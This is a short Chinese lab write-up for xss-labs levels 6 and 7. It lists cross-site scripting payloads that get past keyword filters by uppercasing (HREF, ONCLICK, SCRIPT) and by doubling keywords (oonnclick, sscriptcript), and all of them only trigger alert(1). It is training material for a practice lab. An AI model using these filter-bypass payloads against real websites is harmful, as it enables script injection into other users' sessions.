5、xss-labs之level6

一、level6-----大小写绕过

1、测试分析

测试了之前用过的payload,发现都不行,并且level4使用的Java伪协议也不行,可以得出<>、script、onclick都被过滤

2、构造payload

因为href被过滤,可以试一下大写HREF

初试payload:

"><a HREF=javascript:alert(1)>xss<a/>//

既然可以大写绕过,那payload就多了,只要能够将value或者input标签闭合并且大写就都可以

"><a HREF=javascript:alert(1)>超链接,并弹窗</a>//

"ONCLICK=alert(1)//

"ONCLICK="alert(1)

"><SCRIPT>alert(1)</SCRIPT>//

二、level7-----双写绕过

1、测试分析

测试过的额payload有:

"οnclick=alert(1)//

"οnclick="alert(1)

"><script>alert(1)</script>//

"><a href=javascript:alert(1)>超链接,并弹窗</a>//

传入payload后,查看源码发现,过滤的有

on

script

href

大小写

2、构造payload

可以采用双写绕过,payload:

"oonnclick=alert(1)//

"oonnclick="alert(1)

"><sscriptcript>alert(1)</sscriptcript>//

"><a hhrefref=javasscriptcript:alert(1)>超链接,并弹窗</a>//

总结:

1、绕过方法还可以使用大写绕过

2、将input标签或者value其中一个闭合就可以尝试插入xss

3、双写可以绕过过滤

相关推荐
selectDele14 小时前
Solid.js和React的比较
前端·javascript·react.js·solid.js
小旋风0123415 小时前
前端对接豆包AI(vue2版本)
前端·人工智能
—Qeyser15 小时前
Flutter AppBar 导航栏组件完全指南
前端·javascript·flutter
iSee85715 小时前
struts2 XML外部实体注入漏洞复现(CVE-2025-68493)
xml·安全·struts2
恃宠而骄的佩奇15 小时前
蚁剑 php一句话木马简单免杀(编码)绕过360,火绒
开发语言·web安全·php·免杀·一句话木马·火绒安全
Amumu1213815 小时前
React扩展(一)
前端·javascript·react.js
cypking15 小时前
三、前端规范化 项目代码规范
前端·代码规范
OpenCSG15 小时前
OpenCSG 生态核心:CSGHub 构建企业 AI 全生命周期管理体系,安全与协同双向赋能
人工智能·安全
程序员哈基耄15 小时前
隐私与安全工具集:让数据掌控回归用户手中
安全
xkxnq16 小时前
第二阶段:Vue 组件化开发(第 28天)
前端·javascript·vue.js